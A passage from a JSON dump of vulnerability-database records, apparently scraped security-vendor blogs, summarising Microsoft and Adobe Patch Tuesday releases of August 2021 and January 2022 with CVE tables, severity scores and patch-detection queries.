3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T09:22:32", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-1096", "CVE-2022-24483", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26812", "CVE-2022-26814", "CVE-2022-26829", "CVE-2022-26904"], "modified": "2022-04-23T09:22:32", "id": "AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "href": "https://avleonov.com/2022/04/23/microsoft-patch-tuesday-april-2022-and-custom-cve-comments-sources-in-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-08-21T10:10:11", "description": "### Microsoft Patch Tuesday \u2013 August 2021\n\nMicrosoft patched 51 vulnerabilities in their August 2021 Patch Tuesday release, and 7 of them are rated as critical severity. Three 0-day vulnerability patches were included in the release.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM. A malicious user can use this attack to take complete control over windows domain Per Microsoft, this vulnerability affects all servers, but domain controllers should be prioritized in terms of applying security updates.\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. This Patch Tuesday Microsoft released security updates to address this vulnerability and should be prioritized.\n\n#### Three 0-Day Vulnerabilities Patched\n\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>) - Windows Print Spooler Remote Code Execution Vulnerability\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>) - Windows Update Medic Service Elevation of Privilege Vulnerability - This has been actively exploited, per Microsoft.\n\n#### Qualys QIDs Providing Coverage\n\n**QID**| **Title**| **Severity**| **CVE ID** \n---|---|---|--- \n110388| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities August 2021| Medium| [_CVE-2021-36940_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36940>) \n110389| Microsoft Office and Microsoft Office Services and Web Apps Security Update August 2021 | High| [_CVE-2021-34478_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478>), [_CVE-2021-36941_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36941>) \n375798| Microsoft Azure CycleCloud Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-33762_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33762>), [_CVE-2021-36943_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36943>), [_KB3142345_](<https://www.microsoft.com/en-us/download/details.aspx?id=103313>) \n91801| Microsoft Dynamics Business Central Cross-Site (XSS) Scripting Vulnerability August 2021 | Medium | [_CVE-2021-36946_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36946>) \n91802| Microsoft Windows Security Update for August 2021 \n \n | High| CVE-2021-26424, [_CVE-2021-26425_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26425>), [_CVE-2021-26426_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26426>), [_CVE-2021-26431_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26431>), [_CVE-2021-26432_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432>), [_CVE-2021-26433_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26433>), [_CVE-2021-34480_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480>), [_CVE-2021-34483_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34483>), [_CVE-2021-34484_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34484>), [_CVE-2021-34486_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34486>), [_CVE-2021-34487_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34487>), [_CVE-2021-34530_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34530>), [_CVE-2021-34533_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34533>), [_CVE-2021-34534_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34534>), [_CVE-2021-34535_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34535>), [_CVE-2021-34536_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34536>), [_CVE-2021-34537_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34537>), [_CVE-2021-36926_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36926>), [_CVE-2021-36927_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36927>), [_CVE-2021-36932_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36932>), [_CVE-2021-36933_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36933>), [_CVE-2021-36936_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36936>), [_CVE-2021-36937_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36937>), [_CVE-2021-36938_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36938>), [_CVE-2021-36947_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36947>), [_CVE-2021-36948_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36948>) \n91803| Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability August 2021 | High| [_CVE-2021-36942_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942>) \n91804| Microsoft Windows Defender Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-34471_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34471>) \n91805| Microsoft Windows 10 Update Assistant Elevation of Privilege Vulnerability August 2021 | Medium | [_CVE-2021-36945_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36945>) \n91806| Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability August 2021 | Medium| [_CVE-2021-36949_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36949>) \n91774| Microsoft .NET Core and ASP.NET Core Security Update for August 2021 | High| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n91809| Microsoft Visual Studio Security Update for August 2021 | Medium| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n \n### Adobe Patch Tuesday \u2013 August 2021\n\nAdobe addressed 29 CVEs this Patch Tuesday impacting Adobe Connect and Magento product. The patches for Magento are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\n**Adobe Security Bulletin**| **QID**| **Severity**| **CVE ID** \n---|---|---|--- \nAdobe Connect Multiple Vulnerabilities (APSB21-66) | 730152| Medium| [CVE-2021-36061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36061>), [CVE-2021-36062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36062>), [CVE-2021-36063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36063>) \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/502309>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, August 2021\n * Adobe Patch Tuesday, August 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/502309>)\n\n[Webinar August 12, 2021 or on demand](<https://www.brighttalk.com/webcast/11673/502309>).\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T19:58:49", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (August 2021) \u2013 Microsoft 51 Vulnerabilities with 7 Critical, Adobe 29 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36061", "CVE-2021-36062", "CVE-2021-36063", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949"], "modified": "2021-08-10T19:58:49", "id": "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-08-21T10:49:33", "description": "\n\nHot off the press, it\u2019s another issue of the Patch Tuesday blog! While the number of vulnerabilities is low this month, there are a number of high risk items administrators will want to patch right away including a few that will require additional remediation steps. This Patch Tuesday also includes updates for three vulnerabilities that were publicly disclosed earlier this month. Let\u2019s jump in.\n\n## Windows Elevation of Privilege Vulnerability aka HiveNightmare/SeriousSAM\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934> \nWith a public proof-of-concept having been available for some time, administrators should prioritize taking action on CVE-2021-36934. Remediation for this vulnerability requires volume shadow copies for system files to be deleted. This is due to the nature of the vulnerability, as the files with the vulnerable permissions could be restored from a backup and accessed even after the patch is installed. Microsoft indicates they took caution not to delete users' backups, but the trade-off is that customers will need to do the chore themselves. We've updated [our blog post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) with this additional information.\n\n## Windows LSA Spoofing Vulnerability aka ADV210003\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942> \nAnother high priority action for patching teams is CVE-2021-36942. This update patches one of the vectors used in the PetitPotam attack. After applying this update there are additional configurations required in order to protect systems from other attack vectors using registry keys. The InsightVM team has included detection for the registry keys needed to enable EPA and SMB Signing in addition to the normal update. Please see [our blog post](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for more information.\n\n## Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26432> \nWhile Microsoft has not offered up any details for this vulnerability we can glean some info from the CVSS information. This remote code execution vulnerability is reachable from the network service with no authentication or user action required. There may not be an exploit available for this yet, but Microsoft indicates that \u201cExploitation [is] more likely\u201d. Put this update near the top of your TODO list.\n\n## Windows TCP/IP Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424> \nLast on our list is a vulnerability that can result in remote execution on a Hyper-V host via the IPv6 networking stack. If Hyper-V is used in your environment this should be first on your list this month. \n\n## Summary Graphs\n\n\n\n## Summary Tables\n\n## Azure Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36949>) | Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-26428](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26428>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n[CVE-2021-26429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26429>) | Azure Sphere Elevation of Privilege Vulnerability | No | No | 7.7 | Yes \n[CVE-2021-26430](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26430>) | Azure Sphere Denial of Service Vulnerability | No | No | 6 | Yes \n[CVE-2021-33762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33762>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36943>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 4 | No \n \n## Browser Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-30597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30597>) | Chromium: CVE-2021-30597 Use after free in Browser UI | No | No | | Yes \n[CVE-2021-30596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30596>) | Chromium: CVE-2021-30596 Incorrect security UI in Navigation | No | No | | Yes \n[CVE-2021-30594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30594>) | Chromium: CVE-2021-30594 Use after free in Page Info UI | No | No | | Yes \n[CVE-2021-30593](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30593>) | Chromium: CVE-2021-30593 Out of bounds read in Tab Strip | No | No | | Yes \n[CVE-2021-30592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30592>) | Chromium: CVE-2021-30592 Out of bounds write in Tab Groups | No | No | | Yes \n[CVE-2021-30591](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30591>) | Chromium: CVE-2021-30591 Use after free in File System API | No | No | | Yes \n[CVE-2021-30590](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30590>) | Chromium: CVE-2021-30590 Heap buffer overflow in Bookmarks | No | No | | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34532>) | ASP.NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34485>) | .NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-26423](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26423>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36946>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 5.4 | No \n[CVE-2021-34524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34524>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.1 | No \n[CVE-2021-36950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36950>) | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | 5.4 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36941>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-36940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36940>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-34478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34478>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34471>) | Microsoft Windows Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26426](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26426>) | Windows User Account Profile Picture Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36948>) | Windows Update Medic Service Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-26432](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26432>) | Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-26433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26433>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36926>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36932>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36933>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26431](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26431>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34534>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34530>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34486>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34487>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36938>) | Windows Cryptographic Primitives Library Information Disclosure Vulnerability | No | No | 5.5 | No \n[CVE-2021-36945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36945>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-34536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34536>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34484>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26424>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-36936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36936>) | Windows Print Spooler Remote Code Execution Vulnerability | No | Yes | 8.8 | No \n[CVE-2021-36947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36947>) | Windows Print Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34483>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36937>) | Windows Media MPEG-4 Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-36942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36942>) | Windows LSA Spoofing Vulnerability | No | Yes | 7.5 | Yes \n[CVE-2021-34533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34533>) | Windows Graphics Component Font Parsing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-26425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26425>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36927>) | Windows Digital TV Tuner device registration application Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34537>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34480>) | Scripting Engine Memory Corruption Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34535](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34535>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes", "cvss3": {}, "published": "2021-08-11T03:19:33", "type": "rapid7blog", "title": "Patch Tuesday - August 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26428", "CVE-2021-26429", "CVE-2021-26430", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-30590", "CVE-2021-30591", "CVE-2021-30592", "CVE-2021-30593", "CVE-2021-30594", "CVE-2021-30596", "CVE-2021-30597", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34524", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949", "CVE-2021-36950"], "modified": "2021-08-11T03:19:33", "id": "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "href": "https://blog.rapid7.com/2021/08/11/patch-tuesday-august-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-18T23:27:22", "description": "\n\nThe first Patch Tuesday of 2022 sees Microsoft publishing fixes for over 120 CVEs across the bulk of their product line, including 29 previously patched CVEs affecting their Edge browser via Chromium. None of these have yet been seen exploited in the wild, though six were publicly disclosed prior to today. This includes two Remote Code Execution (RCE) vulnerabilities in open source libraries that are bundled with more recent versions of Windows: [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>), which affects the curl library, and [CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) which affects libarchive.\n\nThe majority of this month\u2019s patched vulnerabilities, such as [CVE-2022-21857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21857>) (affecting Active Directory Domain Services), allow attackers to elevate their privileges on systems or networks they already have a foothold in. \n\n### Critical RCEs\n\nBesides [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-22947>) (libcurl), several other Critical RCE vulnerabilities were also fixed. Most of these have caveats that reduce their scariness to some degree. The worst of these is [CVE-2021-21907](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907>), affecting the Windows HTTP protocol stack. Although it carries a CVSSv3 base score of 9.8 and is considered potentially 